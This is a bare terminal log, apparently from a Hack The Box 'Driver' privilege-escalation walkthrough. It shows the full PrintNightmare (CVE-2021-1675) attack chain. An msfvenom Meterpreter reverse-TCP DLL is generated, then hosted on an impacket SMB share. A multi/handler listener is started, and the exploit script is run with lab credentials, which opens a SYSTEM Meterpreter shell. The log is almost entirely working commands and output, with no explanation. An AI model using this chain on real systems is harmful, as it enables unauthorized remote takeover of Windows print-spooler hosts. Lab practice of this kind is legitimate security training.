Priv Esc
adot@pwndot:~/htb/driver$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4443 -f dll > shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
adot@pwndot:~/htb/driver$ impacket-smbserver share `pwd` -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
adot@pwndot:~$ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 4443; set payload windows/x64/meterpreter/reverse_tcp; run'
adot@pwndot:~/htb/driver/CVE-2021-1675$ python3 CVE-2021-1675.py driver/tony:liltony@10.10.11.106 '\\10.10.14.18\share\shell.dll'
[*] Connecting to ncacn_np:10.10.11.106[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.18\share\shell.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
[*] Sending stage (203846 bytes) to 10.10.11.106
[*] Meterpreter session 1 opened (10.10.14.18:4443 -> 10.10.11.106:49429) at 2025-02-25 06:11:54 -0600
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM